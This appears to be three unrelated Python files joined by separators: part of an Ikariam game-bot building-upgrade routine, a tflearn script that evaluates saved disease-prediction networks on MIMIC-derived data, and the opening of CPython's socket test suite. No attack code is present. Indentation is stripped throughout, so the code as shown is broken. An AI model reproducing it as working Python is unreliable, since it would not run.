level = level + '+'
print(_('({:d})\tlv:{}\t{}').format(i+1, level, building['name']))
selected_building_id = read(min=0, max=len(buildings))
if selected_building_id == 0:
return None
building = buildings[selected_building_id - 1]
current_level = int(building['level'])
# if the building is being expanded, add 1 level
if building['isBusy']:
current_level += 1
banner()
print(_('building:{}').format(building['name']))
print(_('current level:{}').format(current_level))
final_level = read(min=current_level, msg=_('increase to level:'))
building['upgradeTo'] = final_level
return building
def constructionList(session, event, stdin_fd, predetermined_input):
"""
Parameters
----------
session : ikabot.web.session.Session
event : multiprocessing.Event
stdin_fd: int
predetermined_input : multiprocessing.managers.SyncManager.list
"""
sys.stdin = os.fdopen(stdin_fd)
config.predetermined_input = predetermined_input
try:
global expand
global sendResources
expand = True
sendResources = True
banner()
wait_resources = False
print(_('In which city do you want to expand a building?'))
city = chooseCity(session)
cityId = city['id']
building = getBuildingToExpand(session, cityId)
if building is None:
event.set()
return
current_level = building['level']
if building['isBusy']:
current_level += 1
final_level = building['upgradeTo']
# calculate the resources that are needed
resourcesNeeded = getResourcesNeeded(session, city, building, current_level, final_level)
if -1 in resourcesNeeded:
event.set()
return
print('\nMaterials needed:')
for i, name in enumerate(materials_names):
amount = resourcesNeeded[i]
if amount == 0:
continue
print('- {}: {}'.format(name, addThousandSeparator(amount)))
print('')
# calculate the resources that are missing
missing = [0] * len(materials_names)
for i in range(len(materials_names)):
if city['recursos'][i] < resourcesNeeded[i]:
missing[i] = resourcesNeeded[i] - city['recursos'][i]
# show missing resources to the user
if sum(missing) > 0:
print(_('\nMissing:'))
for i in range(len(materials_names)):
if missing[i] == 0:
continue
name = materials_names[i].lower()
print(_('{} of {}').format(addThousandSeparator(missing[i]), name))
print('')
# if the user wants, send the resources from the selected cities
print(_('Automatically transport resources? [Y/n]'))
rta = read(values=['y', 'Y', 'n', 'N', ''])
if rta.lower() == 'n':
print(_('Proceed anyway? [Y/n]'))
rta = read(values=['y', 'Y', 'n', 'N', ''])
if rta.lower() == 'n':
event.set()
return
else:
wait_resources = True
sendResourcesMenu(session, cityId, missing)
else:
print(_('\nYou have enough materials'))
print(_('Proceed? [Y/n]'))
rta = read(values=['y', 'Y', 'n', 'N', ''])
if rta.lower() == 'n':
event.set()
return
except KeyboardInterrupt:
event.set()
return
set_child_mode(session)
event.set()
info = _('\nUpgrade building\n')
info = info + _('City: {}\nBuilding: {}. From {:d}, to {:d}').format(city['cityName'], building['name'], current_level, final_level)
setInfoSignal(session, info)
try:
if expand:
expandBuilding(session, cityId, building, wait_resources)
elif thread:
thread.join()
except Exception as e:
msg = _('Error in:\n{}\nCause:\n{}').format(info, traceback.format_exc())
sendToBot(session, msg)
finally:
session.logout()
|
load_dense_fully_connected_1.py
|
"""Use an ANN to find the probability of occurrence of diseases"""
import tflearn
import numpy as np
import pandas as pd
import tensorflow as tf
from sklearn.cross_validation import train_test_split
from sklearn.metrics import accuracy_score, recall_score, f1_score, precision_score, \
confusion_matrix, roc_curve, auc, roc_auc_score
from sklearn.preprocessing import StandardScaler
from tflearn.data_utils import to_categorical
import os
import sys
import time
from multiprocessing import Process
lib_path = os.path.abspath(os.path.join('../', 'lib'))
sys.path.append(lib_path)
from icd9 import ICD9
# Start time
t1 = time.time()
# Parameters
diag_to_desc = {}
n_epoch = 5
batch_size = 32
size = 100 # Size of each sequence vector
window = 30 # Window for Word2Vec
name = 'Load_FC_n_epoch_' + str(n_epoch) + '_batch_size_' + str(batch_size) \
+ '_size_' + str(size) + '_window_' + str(window) + '_5645_' # name of ROC Plot
def generate_icd9_lookup():
"""Generate description from ICD9 code"""
tree = ICD9('../lib/icd9/codes.json')
for ud in uniq_diag:
try:
diag_to_desc[ud] = tree.find(ud[2:]).description
except:
if ud[2:] == "008":
diag_to_desc[ud] = "Intestinal infections due to other organisms"
elif ud[2:] == "280":
diag_to_desc[ud] = "Iron deficiency anemias"
elif ud[2:] == "284":
diag_to_desc[ud] = "Aplastic anemia and other bone marrow failure syndrome"
elif ud[2:] == "285":
diag_to_desc[ud] = "Other and unspecified anemias"
elif ud[2:] == "286":
diag_to_desc[ud] = "Coagulation defects"
elif ud[2:] == "287":
diag_to_desc[ud] = "Purpura and other hemorrhagic conditions"
elif ud[2:] == "288":
diag_to_desc[ud] = "Diseases of white blood cells"
else:
diag_to_desc[ud] = "Not Found"
# Load the data
df = pd.read_csv('../Data/mimic_diagnosis_word2vec/diagnosis_size_100_window_30_5645_pat.csv', header=None)
X = df.iloc[1:, 1:101].values
# Change later
# Convert label to categorical to train with tflearn
Y = {}
# Get the 80 most common diagnosis from the vocab file
with open('../Data/patient_sequences/vocab') as f:
uniq_diag = np.array(f.read().split('\n')[1].split(' '))
# Get the diagnosis results for each patient
for d, i in zip(uniq_diag, range(101, len(uniq_diag) + 101)):
Y[d] = df[i].values[1:]
model = {}
def model1():
for c, d in enumerate(uniq_diag[:20]):
# Display the training diagnosis
print("--------------------Training {}--------------------".format(d))
# Run each iteration in a graph
with tf.Graph().as_default():
y = Y[d].astype(np.float32)
y = y.reshape(-1, 1)
y = to_categorical(y, nb_classes=2) # Convert label to categorical to train with tflearn
# Train and test data
X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.1, random_state=0)
# Standardize the data
sc = StandardScaler()
sc.fit(X_train)
X_test_sd = sc.transform(X_test)
# Model
input_layer = tflearn.input_data(shape=[None, 100], name='input')
dense1 = tflearn.fully_connected(input_layer, 128, activation='linear', name='dense1')
dropout1 = tflearn.dropout(dense1, 0.8)
dense2 = tflearn.fully_connected(dropout1, 128, activation='linear', name='dense2')
dropout2 = tflearn.dropout(dense2, 0.8)
output = tflearn.fully_connected(dropout2, 2, activation='softmax', name='output')
regression = tflearn.regression(output, optimizer='adam', loss='categorical_crossentropy',
learning_rate=.001)
# Define model with checkpoint (autosave)
model = tflearn.DNN(regression, tensorboard_verbose=3)
# load the previously trained model
model.load('Saved_Models/Fully_Connected/dense_fully_connected_dropout_5645_{}.tfl'.format(d))
# Find the probability of outputs
y_pred_prob = np.array(model.predict(X_test_sd))[:, 1]
# Find the predicted class
y_pred = np.where(y_pred_prob > 0.5, 1., 0.)
# Predicted class is the 2nd column in Y_test
Y_test_dia = Y_test[:, 1]
acc = accuracy_score(Y_test_dia, y_pred) * 100
errors = (y_pred != Y_test_dia).sum()
ps = precision_score(Y_test_dia, y_pred) * 100
rs = recall_score(Y_test_dia, y_pred) * 100
f1 = f1_score(Y_test_dia, y_pred) * 100
confmat = confusion_matrix(y_true=Y_test_dia, y_pred=y_pred)
print("Errors for %s : %.f" % (d, errors))
print("Accuracy for %s : %.2f%%" % (d, acc))
print("Precision for %s : %.2f%%" % (d, ps))
print("Recall for %s : %.2f%%" % (d, rs))
print("F1 Score for %s : %.2f%%" % (d, f1))
print("Confusion Matrix for %s :" % d)
print(confmat)
# Input to roc_curve must be Target scores, can either be
# probability estimates of the positive class, confidence values, or non-thresholded measure of decisions
roc_area = roc_auc_score(Y_test_dia, y_pred_prob)
print("ROC AUC for %s : %.2f" % (d, roc_area))
print('\n')
print('Completed : {0}/{1}'.format(c + 1, len(uniq_diag) / 4))
print('--------------------{} Complete--------------------'.format(d))
print('\n')
def model2():
for c, d in enumerate(uniq_diag[20:40]):
# Display the training diagnosis
print("--------------------Training {}--------------------".format(d))
# Run each iteration in a graph
with tf.Graph().as_default():
y = Y[d].astype(np.float32)
y = y.reshape(-1, 1)
y = to_categorical(y, nb_classes=2) # Convert label to categorical to train with tflearn
# Train and test data
X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.1, random_state=0)
# Standardize the data
sc = StandardScaler()
sc.fit(X_train)
X_test_sd = sc.transform(X_test)
# Model
input_layer = tflearn.input_data(shape=[None, 100], name='input')
dense1 = tflearn.fully_connected(input_layer, 128, activation='linear', name='dense1')
dropout1 = tflearn.dropout(dense1, 0.8)
dense2 = tflearn.fully_connected(dropout1, 128, activation='linear', name='dense2')
dropout2 = tflearn.dropout(dense2, 0.8)
output = tflearn.fully_connected(dropout2, 2, activation='softmax', name='output')
regression = tflearn.regression(output, optimizer='adam', loss='categorical_crossentropy',
learning_rate=.001)
# Define model with checkpoint (autosave)
model = tflearn.DNN(regression, tensorboard_verbose=3)
# load the previously trained model
model.load('Saved_Models/Fully_Connected/dense_fully_connected_dropout_5645_{}.tfl'.format(d))
# Find the probability of outputs
y_pred_prob = np.array(model.predict(X_test_sd))[:, 1]
# Find the predicted class
y_pred = np.where(y_pred_prob > 0.5, 1., 0.)
# Predicted class is the 2nd column in Y_test
Y_test_dia = Y_test[:, 1]
acc = accuracy_score(Y_test_dia, y_pred) * 100
errors = (y_pred != Y_test_dia).sum()
ps = precision_score(Y_test_dia, y_pred) * 100
rs = recall_score(Y_test_dia, y_pred) * 100
f1 = f1_score(Y_test_dia, y_pred) * 100
confmat = confusion_matrix(y_true=Y_test_dia, y_pred=y_pred)
print("Errors for %s : %.f" % (d, errors))
print("Accuracy for %s : %.2f%%" % (d, acc))
print("Precision for %s : %.2f%%" % (d, ps))
print("Recall for %s : %.2f%%" % (d, rs))
print("F1 Score for %s : %.2f%%" % (d, f1))
print("Confusion Matrix for %s :" % d)
print(confmat)
# Input to roc_curve must be Target scores, can either be
# probability estimates of the positive class, confidence values, or non-thresholded measure of decisions
roc_area = roc_auc_score(Y_test_dia, y_pred_prob)
print("ROC AUC for %s : %.2f" % (d, roc_area))
print('\n')
print('Completed : {0}/{1}'.format(c + 1, len(uniq_diag) / 4))
print('--------------------{} Complete--------------------'.format(d))
print('\n')
def model3():
for c, d in enumerate(uniq_diag[40:60]):
# Display the training diagnosis
print("--------------------Training {}--------------------".format(d))
# Run each iteration in a graph
with tf.Graph().as_default():
y = Y[d].astype(np.float32)
y = y.reshape(-1, 1)
y = to_categorical(y, nb_classes=2) # Convert label to categorical to train with tflearn
# Train and test data
X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.1, random_state=0)
# Standardize the data
sc = StandardScaler()
sc.fit(X_train)
X_test_sd = sc.transform(X_test)
# Model
input_layer = tflearn.input_data(shape=[None, 100], name='input')
dense1 = tflearn.fully_connected(input_layer, 128, activation='linear', name='dense1')
dropout1 = tflearn.dropout(dense1, 0.8)
dense2 = tflearn.fully_connected(dropout1, 128, activation='linear', name='dense2')
dropout2 = tflearn.dropout(dense2, 0.8)
output = tflearn.fully_connected(dropout2, 2, activation='softmax', name='output')
regression = tflearn.regression(output, optimizer='adam', loss='categorical_crossentropy',
learning_rate=.001)
# Define model with checkpoint (autosave)
model = tflearn.DNN(regression, tensorboard_verbose=3)
# load the previously trained model
model.load('Saved_Models/Fully_Connected/dense_fully_connected_dropout_5645_{}.tfl'.format(d))
# Find the probability of outputs
y_pred_prob = np.array(model.predict(X_test_sd))[:, 1]
# Find the predicted class
y_pred = np.where(y_pred_prob > 0.5, 1., 0.)
# Predicted class is the 2nd column in Y_test
Y_test_dia = Y_test[:, 1]
acc = accuracy_score(Y_test_dia, y_pred) * 100
errors = (y_pred != Y_test_dia).sum()
ps = precision_score(Y_test_dia, y_pred) * 100
rs = recall_score(Y_test_dia, y_pred) * 100
f1 = f1_score(Y_test_dia, y_pred) * 100
confmat = confusion_matrix(y_true=Y_test_dia, y_pred=y_pred)
print("Errors for %s : %.f" % (d, errors))
print("Accuracy for %s : %.2f%%" % (d, acc))
print("Precision for %s : %.2f%%" % (d, ps))
print("Recall for %s : %.2f%%" % (d, rs))
print("F1 Score for %s : %.2f%%" % (d, f1))
print("Confusion Matrix for %s :" % d)
print(confmat)
# Input to roc_curve must be Target scores, can either be
# probability estimates of the positive class, confidence values, or non-thresholded measure of decisions
roc_area = roc_auc_score(Y_test_dia, y_pred_prob)
print("ROC AUC for %s : %.2f" % (d, roc_area))
print('\n')
print('Completed : {0}/{1}'.format(c + 1, len(uniq_diag) / 4))
print('--------------------{} Complete--------------------'.format(d))
print('\n')
def model4():
for c, d in enumerate(uniq_diag[60:]):
# Display the training diagnosis
print("--------------------Training {}--------------------".format(d))
# Run each iteration in a graph
with tf.Graph().as_default():
y = Y[d].astype(np.float32)
y = y.reshape(-1, 1)
y = to_categorical(y, nb_classes=2) # Convert label to categorical to train with tflearn
# Train and test data
X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.1, random_state=0)
# Standardize the data
sc = StandardScaler()
sc.fit(X_train)
X_test_sd = sc.transform(X_test)
# Model
input_layer = tflearn.input_data(shape=[None, 100], name='input')
dense1 = tflearn.fully_connected(input_layer, 128, activation='linear', name='dense1')
dropout1 = tflearn.dropout(dense1, 0.8)
dense2 = tflearn.fully_connected(dropout1, 128, activation='linear', name='dense2')
dropout2 = tflearn.dropout(dense2, 0.8)
output = tflearn.fully_connected(dropout2, 2, activation='softmax', name='output')
regression = tflearn.regression(output, optimizer='adam', loss='categorical_crossentropy',
learning_rate=.001)
# Define model with checkpoint (autosave)
model = tflearn.DNN(regression, tensorboard_verbose=3)
# load the previously trained model
model.load('Saved_Models/Fully_Connected/dense_fully_connected_dropout_5645_{}.tfl'.format(d))
# Find the probability of outputs
y_pred_prob = np.array(model.predict(X_test_sd))[:, 1]
# Find the predicted class
y_pred = np.where(y_pred_prob > 0.5, 1., 0.)
# Predicted class is the 2nd column in Y_test
Y_test_dia = Y_test[:, 1]
acc = accuracy_score(Y_test_dia, y_pred) * 100
errors = (y_pred != Y_test_dia).sum()
ps = precision_score(Y_test_dia, y_pred) * 100
rs = recall_score(Y_test_dia, y_pred) * 100
f1 = f1_score(Y_test_dia, y_pred) * 100
confmat = confusion_matrix(y_true=Y_test_dia, y_pred=y_pred)
print("Errors for %s : %.f" % (d, errors))
print("Accuracy for %s : %.2f%%" % (d, acc))
print("Precision for %s : %.2f%%" % (d, ps))
print("Recall for %s : %.2f%%" % (d, rs))
print("F1 Score for %s : %.2f%%" % (d, f1))
print("Confusion Matrix for %s :" % d)
print(confmat)
# Input to roc_curve must be Target scores, can either be
# probability estimates of the positive class, confidence values, or non-thresholded measure of decisions
roc_area = roc_auc_score(Y_test_dia, y_pred_prob)
print("ROC AUC for %s : %.2f" % (d, roc_area))
print('\n')
print('Completed : {0}/{1}'.format(c + 1, len(uniq_diag) / 4))
print('--------------------{} Complete--------------------'.format(d))
print('\n')
if __name__ == '__main__':
p1 = Process(target=model1)
p1.start()
p2 = Process(target=model2)
p2.start()
p3 = Process(target=model3)
p3.start()
p4 = Process(target=model4)
p4.start()
p1.join()
p2.join()
p3.join()
p4.join()
print("--------------------Training Done!!!--------------------")
# Calculate time
t2 = time.time()
print("Time Taken : {:.2f} s".format(t2 - t1))
|
test_socket.py
|
#!/usr/bin/env python3
import unittest
from test import support
from unittest.case import _ExpectedFailure
import errno
import io
import socket
import select
import tempfile
import _testcapi
import time
import traceback
import queue
import sys
import os
import array
import platform
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
try:
import fcntl
except ImportError:
fcntl = False
try:
import multiprocessing
except ImportError:
multiprocessing = False
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
try:
import _thread as thread
import threading
except ImportError:
thread = None
threading = None
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, socket.error, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_RDS = _have_socket_rds()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen(1)
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
if threading:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except socket.error:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceeded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
self.clientSetUp()
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except _ExpectedFailure:
# We deliberately ignore expected failures
pass
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except socket.error:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen(1)
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
sock.bind(path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
# Don't use "localhost" here - it may not have an IPv6 address
# assigned to it by default (e.g. in /etc/hosts), and if someone
# has assigned it an IPv4-mapped address, then it's unlikely to
# work with the full IPv6 API.
host = "::1"
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except socket.error as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
self.assertTrue(repr(s).startswith("<socket.socket object"))
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(socket.error, msg=msg % 'socket.error'):
raise socket.error
with self.assertRaises(socket.error, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(socket.error, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doens't masks failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"'str' does not support the buffer interface")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"'complex' does not support the buffer interface")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"'str' does not support the buffer interface")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"'complex' does not support the buffer interface")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
